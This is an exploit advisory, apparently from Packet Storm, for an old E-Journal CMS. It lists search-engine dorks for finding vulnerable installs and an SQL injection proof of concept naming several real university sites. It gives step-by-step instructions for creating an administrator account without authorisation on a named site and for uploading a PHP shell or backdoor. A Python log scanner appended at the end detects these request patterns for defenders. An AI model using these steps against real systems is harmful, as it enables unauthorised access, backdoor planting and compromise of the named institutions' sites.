
E-Journal 1.0 Shell Upload / SQL Injection

17 Dec 2014 | Reported by X-Cisadane | Type: packetstorm | Source: packetstormsecurity.com

E-Journal 1.0 Shell Upload / SQL Injection, Privilege Escalation, and Multiple Vulnerabilities

Code
`==========================================================================================   
E-Journal (Old Version) Multiple Vulnerabilities   
==========================================================================================   
  
:-------------------------------------------------------------------------------------------------------------------------:   
: # Exploit Title : E-Journal (Old Version) Multiple Vulnerabilities   
: # Date : 17th December 2014   
: # Author : X-Cisadane   
: # CMS Developer : http://simlitabmas.dikti.go.id/ejournal/   
: # Version : Old Version   
: # CMS Language : Indonesian   
: # Category : Web Applications   
: # Vulnerability : SQL Injection, Privilege Escalation and File Upload Vulnerability   
: # Tested On : Google Chrome Version 39.0.2171.95 m (Windows 7 Ultimate 32-Bit English)   
: # Greetz to : X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari   
:-------------------------------------------------------------------------------------------------------------------------:  
  
DORKS (How to find the target) :   
================================   
inurl:mahasiswa.php intitle:E-Journal   
inurl:dosen.php intitle:E-Journal   
inurl:jurnal.php intitle:E-Journal   
inurl:dokumen.php intitle:E-Journal   
"Karya Tulis Mahasiswa" intitle:E-Journal   
"Design & Programming by" intitle:E-Journal   
"E-Journal adalah aplikasi berbasis web untuk"   
Or use your own Google Dorks :)   
  
P.S.: This E-Journal CMS has 2 versions. The old version doesn't have informasi.php (Informasi menu).   
  
Proof of Concept   
================   
  
[ 1 ] SQL Injection   
POC :   
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=['SQLi]   
  
Example :   
http://e-journal.uniga.ac.id/jurnal.php?detail=jurnal&id='133   
http://www.ejournal-fkipunibba.com/jurnal.php?detail=jurnal&id='133   
http://e-journal.uika-bogor.ac.id/jurnal.php?detail=jurnal&id='133   
http://ejurnal.unjani.ac.id/jurnal.php?detail=jurnal&id='133   
http://ejournal.stikesborromeus.ac.id/jurnal.php?detail=jurnal&id='133   
...etc...   
  
[ 2 ] Privilege Escalation   
You can create a new Administrator Account by Using this Trick.   
For Example my Target is : http://www.ejournal-fisipunla.com/   
  
Step 1 : Add data.php?tambah=dosen in the URL   
So in this case the URL was http://www.ejournal-fisipunla.com/data.php?tambah=dosen   
  
Step 2 : Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR".   
Ignore that Notice and click Admin Menu.   
Screenshot #1 : http://i59.tinypic.com/54he2b.png   
  
Step 3 : Tadaaa... Now you can add an Administrator Account.   
Screenshot #2 : http://i59.tinypic.com/2i8vyus.png   
  
[ 3 ] Upload PHP File (PHP Shell / Backdoor)   
After the new Administrator account has been created, you can log on as an Administrator and upload a PHP file.   
  
Admin Control Panel Path : http://[Site]/[Path]/admin.php   
Example : http://www.ejournal-fisipunla.com/admin.php   
  
Then upload your PHP Shell / Backdoor from http://[Site]/[Path]/data.php?tambah=dosen   
Upload your PHP file in the File and Cover form.   
Screenshot #3 : http://i59.tinypic.com/24cxhrc.png   
  
Open your Backdoor / PHP Shell in :   
http://[Site]/[Path]/cover/your php file name.php   
http://[Site]/[Path]/file/your php file name.php   
`
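
A defender-side check for the three request patterns in the advisory above, as an added example that is not part of the original advisory: it scans web-server access logs for non-numeric `id` values on jurnal.php, requests for data.php?tambah=dosen, and script files requested from cover/ or file/. Combined log format is assumed; the function names, log lines, addresses and file names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Script extensions that should never be served from the upload directories.
SCRIPT_RE = re.compile(r"/(cover|file)/[^/]+\.(php\d?|phtml|phar)$")

def classify(target):
    """Return the advisory items (1-3) that a request target matches."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # [1] jurnal.php: a legitimate id is a plain decimal integer.
    if path.endswith("/jurnal.php"):
        if any(not re.fullmatch(r"[0-9]+", v) for v in query.get("id", [])):
            findings.append("non-numeric id on jurnal.php")
    # [2] data.php?tambah=dosen: compare hits against known admin sessions.
    if path.endswith("/data.php") and "dosen" in query.get("tambah", []):
        findings.append("admin form data.php?tambah=dosen requested")
    # [3] cover/ and file/ hold uploads; a script request there is suspect.
    if SCRIPT_RE.search(path):
        findings.append("script requested from upload directory")
    return findings

def scan(lines):
    """Return (client, method, target, status, findings) for flagged lines."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-log-format request line
        client, method, target, status = m.groups()
        findings = classify(target)
        if findings:
            hits.append((client, method, target, int(status), findings))
    return hits

# Constructed sample log lines (documentation addresses, made-up file names).
SAMPLE = [
    '192.0.2.10 - - [17/Dec/2014:10:00:01 +0700] "GET /jurnal.php?detail=jurnal&id=133 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Dec/2014:10:00:05 +0700] "GET /jurnal.php?detail=jurnal&id=%27133 HTTP/1.1" 200 312',
    '198.51.100.7 - - [17/Dec/2014:10:01:10 +0700] "GET /data.php?tambah=dosen HTTP/1.1" 200 2048',
    '198.51.100.7 - - [17/Dec/2014:10:02:30 +0700] "POST /data.php?tambah=dosen HTTP/1.1" 200 150',
    '198.51.100.7 - - [17/Dec/2014:10:03:00 +0700] "GET /cover/x.php HTTP/1.1" 200 20',
    '192.0.2.10 - - [17/Dec/2014:10:04:00 +0700] "GET /cover/issue12.png HTTP/1.1" 200 40000',
]
```

Hits on data.php?tambah=dosen are expected from real administrators, so that finding is only meaningful when correlated with authenticated admin sessions or known admin source addresses.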
